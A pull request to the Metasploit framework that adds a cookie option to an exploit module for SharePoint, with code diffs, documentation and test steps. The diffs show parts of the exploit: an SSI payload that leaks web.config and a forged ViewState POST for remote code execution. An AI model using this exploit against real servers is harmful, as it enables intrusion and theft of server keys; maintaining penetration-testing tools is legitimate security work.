### PR TITLE
Update/sharepoint ssi viewstate by adding cookie option

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
@@ -52,6 +52,11 @@ Set this to the SharePoint password.
 
 Set this to the ViewState validation key if you have it.
 
+### COOKIE
+
+Set this to a SharePoint cookie if you have one. This is primarily
+useful for form auth.
+
 ## Scenarios
 
 ### SharePoint 2019 on Windows Server 2016
@@ -65,6 +70,7 @@ Module options (exploit/windows/http/sharepoint_ssi_viewstate):
 
    Name            Current Setting  Required  Description
    ----            ---------------  --------  -----------
+   COOKIE                           no        SharePoint cookie if you have one
    HttpPassword                     no        SharePoint password
    HttpUsername                     no        SharePoint username
    Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
-      OptString.new('Cookie', [false, 'SharePoint cookie if you have one']),
+      OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password'])

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -22,11 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a server-side include (SSI) in SharePoint to leak
           the web.config file and forge a malicious ViewState with the extracted
           validation key.
+
           This exploit is authenticated and requires a user with page creation
           privileges, which is a standard permission in SharePoint.
+
           The web.config file will be stored in loot once retrieved, and the
           VALIDATION_KEY option can be set to short-circuit the SSI and trigger
           the ViewState deserialization.
+
           Tested against SharePoint 2019 on Windows Server 2016.
         },
         'Author' => [

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -22,14 +22,11 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a server-side include (SSI) in SharePoint to leak
           the web.config file and forge a malicious ViewState with the extracted
           validation key.
-
           This exploit is authenticated and requires a user with page creation
           privileges, which is a standard permission in SharePoint.
-
           The web.config file will be stored in loot once retrieved, and the
           VALIDATION_KEY option can be set to short-circuit the SSI and trigger
           the ViewState deserialization.
-
           Tested against SharePoint 2019 on Windows Server 2016.
         },
         'Author' => [
@@ -90,6 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'Base path', '/']),
       OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('Cookie', [false, 'SharePoint cookie if you have one']),
       # "Promote" these advanced options so we don't have to pass around our own
       OptString.new('HttpUsername', [false, 'SharePoint username']),
       OptString.new('HttpPassword', [false, 'SharePoint password'])
@@ -108,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['HttpPassword']
   end
 
+  def cookie
+    datastore['Cookie']
+  end
+
   def vuln_builds
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
@@ -121,7 +123,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path)
+      'uri' => normalize_uri(target_uri.path),
+      'cookie' => cookie
     )
 
     unless res
@@ -176,6 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'PUT',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'data' => ssi_page
     )
 
@@ -201,6 +205,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'headers' => {
         ssi_header => '<form runat="server" /><!--#include virtual="/web.config"-->'
       }
@@ -235,6 +240,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'DELETE',
       'uri' => ssi_path,
+      'cookie' => cookie,
       'partial' => true
     )
 
@@ -256,6 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+      'cookie' => cookie,
       'vars_post' => {
         '__VIEWSTATE' => generate_viewstate_payload(
           cmd,

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cookie
-    datastore['Cookie']
+    datastore['COOKIE']
   end
 
   def vuln_builds


### PR DESCRIPTION
Add cookie header as an option.
This can be used when authentication is performed trough an HTTP form for example.

Verification
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/sharepoint_ssi_viewstate`
- [ ] `set Cookie ''`
- [ ] **Verify** Configure other inputs function of the target and run the exploit. The exploit shall work properly using added inputs.

Updates #14265.